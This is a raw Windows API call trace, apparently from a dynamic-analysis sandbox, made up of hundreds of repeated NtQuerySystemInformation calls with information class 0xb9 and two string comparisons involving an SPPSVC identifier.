[0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.770] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.778] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.805] 